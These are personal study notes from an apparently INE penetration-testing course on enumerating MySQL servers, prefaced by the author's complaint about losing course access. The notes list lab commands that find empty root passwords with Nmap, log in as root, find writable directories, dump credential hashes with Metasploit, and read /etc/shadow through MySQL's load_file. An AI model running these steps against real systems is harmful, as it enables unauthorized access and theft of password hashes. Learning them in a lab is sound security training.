____________________________________________________________________
**Important Note: This is where I had to discontinue my notes on the Enumeration course by Josh Mason, the notes here thus stand incomplete, since my access to the course content was revoked prior to being able to complete the course, when the new course by Alexis Ahmed was launched.**

**I am not particularly fond of INE's treatment of their users with regards to the resolution of issues like these, pertinent to content scheduling. I would have liked if they could do a better job at either releasing the content on its promised time, instead of delaying it for weeks and digging into the subscription period that I paid for; or providing more time to access the "Soon Retiring" courses so that the people who have put in hours on those can complete them instead of being forced to break the flow and start fresh with the revised course.**
____________________________________________________________________

- MySQL is one of the most commonly used open source SQL databases. It is very common to find on an enterprise network, often misconfigured and vulnerable.
- It usually runs on Ubuntu or some version of Linux, or Unix.
- It allows many users to store information in the database, which can be pulled and used in many different operations.
- MySQL generally uses tcp/3306 as its default port.

Using Nmap scripts to find users with null logins enabled on the MySQL server
	- The `mysql-empty-password` script checks for MySQL servers with an empty password for `root` or `anonymous`.
	- `nmap demo.ine.local -sV -p 3306 --script=mysql-empty-password`

Using Nmap scripts to enumerate information about the MySQL server
	- The `mysql-info` script connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt.
	- `nmap demo.ine.local -sV -p 3306 --script=mysql-info`
	- An `InteractiveClient` capability, when found in this scans' results can be further used to interact with the system directly using the MySQL server.

Executing MySQL commands on the target server
	- `mysql -h 192.125.250.3 -u root`
	- root generally tends to be the default admin user for the database, since the server is running on Linux.
	- The `show databases;` command can be used to list databases.
	- The `use database_name;` command can be used to change the database to the specified one.
	- `select * from authors;` will show all the information present in the authors table.
	- As expected, general SQL syntax can be used to query databases in MySQL.
	- The `help` command can be used for further information.

Writable target host directories enumeration using Metasploit Framework
	- `use /auxiliary/scanner/mysql/mysql_writable_dirs`
	- `show options`
	- `set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt`
	- `set rhosts demo.ine.local`
	- We can use the `setg` command instead to set option values globally for a specific session.
	- We can use the `advanced` command to list advanced options for a specific module.
	- `advanced`
	- `set verbose false`
	- `set password ""`
	- `run`

Credential hash enumeration using Metasploit Framework
	- `msfconsole`
	- `use auxiliary/scanner/mysql/mysql_hashdump`
	- `options`
	- `set RHOSTS demo.ine.local`
	- `set username root`
	- `set password ""`
	- `exploit`

Using the root user with a null login on MySQL to retrieve credentials hashes from `/etc/shadow`
	- `mysql -h demo.ine.local -u root`
	- `select load_file("/etc/shadow");`